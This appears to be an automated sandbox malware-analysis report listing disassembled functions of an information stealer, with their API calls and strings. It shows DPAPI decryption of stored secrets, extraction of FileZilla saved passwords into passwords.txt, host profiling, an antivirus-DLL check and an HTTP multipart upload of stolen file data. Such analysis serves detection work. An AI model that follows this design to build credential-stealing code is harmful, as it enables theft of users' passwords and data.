Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 8adffb2fe5d2c7e5cdd5f08c500636d4ad34f13b2ec86e6fd4d3f2c2afc62c09
Instruction ID: 5f2b6f54d54c868f4df7d25c6eb5f4815cb1d7c1040a702623cce6174d40ad56
Opcode Fuzzy Hash: 8adffb2fe5d2c7e5cdd5f08c500636d4ad34f13b2ec86e6fd4d3f2c2afc62c09
Instruction Fuzzy Hash: 5F113A74D0425A9FCB019FA4D8889AEBFB7BF4A310F54406CF255EB251CB754A81CB64

Function 006192A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00619456), ref: 006192C9
LocalAlloc.KERNEL32(00000040,00619456,?,?,00619456,?,0061DC56,?,?,?,?,?,?), ref: 006192DD
LocalFree.KERNEL32(?,?,?,00619456,?,0061DC56,?,?,?,?,?,?), ref: 00619302

Strings

DPAPI, xrefs: 006192AE

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 0eef875cb18e691389e3ca16b2b021c1e2adff73b26f31de3263709e1490c95e
Instruction ID: ba6f5557eb28d5bd880fef78aa0f397618056ba40a1bb6f37b33b6027f99a579
Opcode Fuzzy Hash: 0eef875cb18e691389e3ca16b2b021c1e2adff73b26f31de3263709e1490c95e
Instruction Fuzzy Hash: 3B01FBB6A01218AFCB00DFA8D8848EEBBB9FF49715B144065E905E7340D770AF40CBA0

Function 00623101 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00647817,?,?), ref: 00623130
Process32First.KERNEL32(00000000,00000128), ref: 00623140
Process32Next.KERNEL32(00000000,00000128), ref: 0062319E
CloseHandle.KERNEL32(00000000), ref: 006231A9

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: a309f067145933ebd9fd01f30717aa5943bc79e542194795fb9df0d2600b6b4a
Instruction ID: fcd842d43048fd55dcb04243a7449c84cc7a1177ef685292ec101cd9db4681ef
Opcode Fuzzy Hash: a309f067145933ebd9fd01f30717aa5943bc79e542194795fb9df0d2600b6b4a
Instruction Fuzzy Hash: D111A331A00629ABD760AB65AC89BEE77BEBB05700F000099BA05A3241CF389F54CF50

Function 00623AB9 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,0061543A,?,?,?,?), ref: 00623AD9
GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00623AE6
RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 00623AED

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateBinaryCryptProcessString
String ID:
API String ID: 869800140-0
Opcode ID: be75942dd1ac02d5bf0c37356bc9a14dcdc824763431aa3bc2e436472730d04d
Instruction ID: 00cf9e5670cafb151270476023237aa133df22a3047a15262340bdb41ae42f4c
Opcode Fuzzy Hash: be75942dd1ac02d5bf0c37356bc9a14dcdc824763431aa3bc2e436472730d04d
Instruction Fuzzy Hash: 8F015A70100618BFDF018F61EC89CAB7BBAFF5A361B244468F84582210DB399A51EF20

Function 0062298A Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 006229A5
HeapAlloc.KERNEL32(00000000), ref: 006229AC
GetTimeZoneInformation.KERNEL32(?), ref: 006229BB
wsprintfA.USER32 ref: 006229D9

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 0ac19d25dd4e9ed2663cb2d5778483aeaf8d4e2357153f77c57996b68339d19b
Instruction ID: 42031dbda637de2687dc5442d069a6154561c27cb5befbbb33232d4ffc66c0cb
Opcode Fuzzy Hash: 0ac19d25dd4e9ed2663cb2d5778483aeaf8d4e2357153f77c57996b68339d19b
Instruction Fuzzy Hash: 33F0E970A013246BD700EB74EC09BAB776AFF05321F100259F515D32D0DF749E448B92

Function 006228AF Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006113A9), ref: 006228BB
HeapAlloc.KERNEL32(00000000,?,?,?,006113A9), ref: 006228C2
GetUserNameA.ADVAPI32(00000000,006113A9), ref: 006228D6

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 41449f0fd33aa1c3b2be86c842cb88769e03ba031924646b202c23945d5c52aa
Instruction ID: a996eb9b7891b8e3361396043e58498a7e392bd2a2e98b32f58052417b0f17ee
Opcode Fuzzy Hash: 41449f0fd33aa1c3b2be86c842cb88769e03ba031924646b202c23945d5c52aa
Instruction Fuzzy Hash: CED05BB9640344BBD7109B95DC0DE8A7BBDD787B15F001056F605D6150DDF099C88630

Function 00622C16 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00622C30
wsprintfA.USER32 ref: 00622C48

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 15ecbacdd5dec7371f61bc8b4370856565aace5f10671e3d7455dc32a08626aa
Instruction ID: 0627f2676f2ccdf1fcd021f7d917caff0fa0a654fa43f6632f201acb4e140326
Opcode Fuzzy Hash: 15ecbacdd5dec7371f61bc8b4370856565aace5f10671e3d7455dc32a08626aa
Instruction Fuzzy Hash: 13E0E57091021C9BCB11EFA0ED59ADEB7FDBB09304F4045B6A506A3190DAB4AB888F85

Function 0061149D Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,006114F3,avghookx.dll,00629D23), ref: 006114CF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 7c3fa8af6105ac4027492a81231b9cbeb1f3258bb74ebef324a27dcbc11e0156
Instruction ID: 77962c0a662e3ce8b23d5fae0a99cd39ff707ea267193141d2b7f600dda1237a
Opcode Fuzzy Hash: 7c3fa8af6105ac4027492a81231b9cbeb1f3258bb74ebef324a27dcbc11e0156
Instruction Fuzzy Hash: AAF08236900110EBCF20CF55D804AEAF7FAEB43B60F297054D509BB600C734EE81DA98

Function 006153AA Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A10
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A16
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A1C
Part of subcall function 006149DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00614A2E
Part of subcall function 006149DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00614A36

lstrlenA.KERNEL32(?), ref: 00615441

Part of subcall function 00623AB9: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,0061543A,?,?,?,?), ref: 00623AD9
Part of subcall function 00623AB9: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00623AE6
Part of subcall function 00623AB9: RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 00623AED

StrCmpCA.SHLWAPI(?,00647A3B,00647A3A,00647A37,00647A2F), ref: 006154B0
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 006154D2
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006155E8
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 0061562C
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0061565E

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

lstrlenA.KERNEL32(?,",file_data,00648A18,------,00648A0C,?,",00648A00,------,006489F4,93e4f2dec1428009f8bc755e83a21d1b,",build_id,006489DC,------), ref: 00615B8F
lstrlenA.KERNEL32(?), ref: 00615BA2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00615BBA
HeapAlloc.KERNEL32(00000000), ref: 00615BC1
lstrlenA.KERNEL32(?), ref: 00615BCE
_memmove.LIBCMT ref: 00615BDC
lstrlenA.KERNEL32(?,?,?), ref: 00615BF1
_memmove.LIBCMT ref: 00615BFE
lstrlenA.KERNEL32(?), ref: 00615C0C
lstrlenA.KERNEL32(?,?,00000000), ref: 00615C1A
_memmove.LIBCMT ref: 00615C2D
lstrlenA.KERNEL32(?,?,00000000), ref: 00615C42
HttpSendRequestA.WININET(?,?,00000000), ref: 00615C55
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00615C97
InternetReadFile.WININET(?,?,000007CF,?), ref: 00615D4E
StrCmpCA.SHLWAPI(?,block), ref: 00615D63
ExitProcess.KERNEL32 ref: 00615D6E

Strings

", xrefs: 00615743
------, xrefs: 0061552D
build_id, xrefs: 00615877
------, xrefs: 00615664
block, xrefs: 00615D58
", xrefs: 00615A00
", xrefs: 006158A3
", xrefs: 00615B5D
------, xrefs: 006157C5
------, xrefs: 00615927
ERROR, xrefs: 00615E57
ERROR, xrefs: 00615CA1
--, xrefs: 00615528
------, xrefs: 00615A85
file_data, xrefs: 00615B31
93e4f2dec1428009f8bc755e83a21d1b, xrefs: 006158CF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$OpenRequestlstrcat$AllocAllocateBinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$93e4f2dec1428009f8bc755e83a21d1b$ERROR$ERROR$block$build_id$file_data
API String ID: 215681420-679176126
Opcode ID: bc199def6922dcfb3f5b910b1a6199eda9bd05eb124717e62c2e8ec2911d1df8
Instruction ID: 8c0faddfe22c4f94c3ea6cdda2dabaa6cc0170db732a61c732c2019a5c141230
Opcode Fuzzy Hash: bc199def6922dcfb3f5b910b1a6199eda9bd05eb124717e62c2e8ec2911d1df8
Instruction Fuzzy Hash: C742D832D0156E9ADF60EB25EC56ADDB3BABF00300F0585E5A64873122CE716FD69F84

Function 0061F6CB Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 292
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

Part of subcall function 00623A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00628680,?), ref: 00623A93

strtok_s.MSVCRT ref: 0061F77A
GetProcessHeap.KERNEL32(00000000,000F423F,006479E7,006479D7,006479D6,006479D3), ref: 0061F7C0
HeapAlloc.KERNEL32(00000000), ref: 0061F7C7
StrStrA.SHLWAPI(00000000,<Host>), ref: 0061F7DB
lstrlenA.KERNEL32(00000000), ref: 0061F7E6
StrStrA.SHLWAPI(00000000,<Port>), ref: 0061F81A
lstrlenA.KERNEL32(00000000), ref: 0061F825
StrStrA.SHLWAPI(00000000,<User>), ref: 0061F853
lstrlenA.KERNEL32(00000000), ref: 0061F85E
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0061F88C
lstrlenA.KERNEL32(00000000), ref: 0061F897
lstrlenA.KERNEL32(?), ref: 0061F902
lstrlenA.KERNEL32(?), ref: 0061F916
lstrlenA.KERNEL32(0061FCF9), ref: 0061FA3E

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

Strings

Login: , xrefs: 0061F98D
Password: , xrefs: 0061F9AF
Host: , xrefs: 0061F955
passwords.txt, xrefs: 0061FA4E
<Pass encoding="base64">, xrefs: 0061F886
<Port>, xrefs: 0061F814
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0061F71B
<User>, xrefs: 0061F84D
Soft: FileZilla, xrefs: 0061F949
<Host>, xrefs: 0061F7D5

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: d564f8967dc67002c55c7de696a2592e42fba9097814dc9aeae717822d06765e
Instruction ID: 873d6a7e46bdfc171ac161f54e45540b2aec0ef48b892191e7a9ae1057e6a576
Opcode Fuzzy Hash: d564f8967dc67002c55c7de696a2592e42fba9097814dc9aeae717822d06765e
Instruction Fuzzy Hash: 62A15C32A4061AAFCB40BBA5EC5A9DD7B7ABF05301F050424F700B71A1DF356A96CB94

Function 0061F182 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
registryCOMMON

